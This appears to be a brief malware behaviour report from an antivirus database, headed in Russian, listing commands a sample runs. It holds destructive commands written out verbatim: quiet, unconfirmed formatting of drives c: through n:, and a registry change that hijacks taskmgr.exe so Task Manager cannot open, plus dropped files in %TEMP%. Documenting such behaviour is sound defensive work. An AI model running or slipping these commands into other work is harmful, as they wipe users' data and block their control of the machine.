Техническая информация
- <SYSTEM32>\format.com /q j: /y
- <SYSTEM32>\format.com /q g: /y
- <SYSTEM32>\format.com /q c: /y
- <SYSTEM32>\format.com /q n: /y
- <SYSTEM32>\format.com /q e: /y
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\viurs.bat" "
- <SYSTEM32>\format.com /q f: /y
- <SYSTEM32>\format.com /q d: /y
- <Служебный элемент>
- %TEMP%\1.tmp\alaooy .exe
- %TEMP%\1.tmp\viurs.bat
- <Служебный элемент>
- %TEMP%\1.tmp\alaooy .exe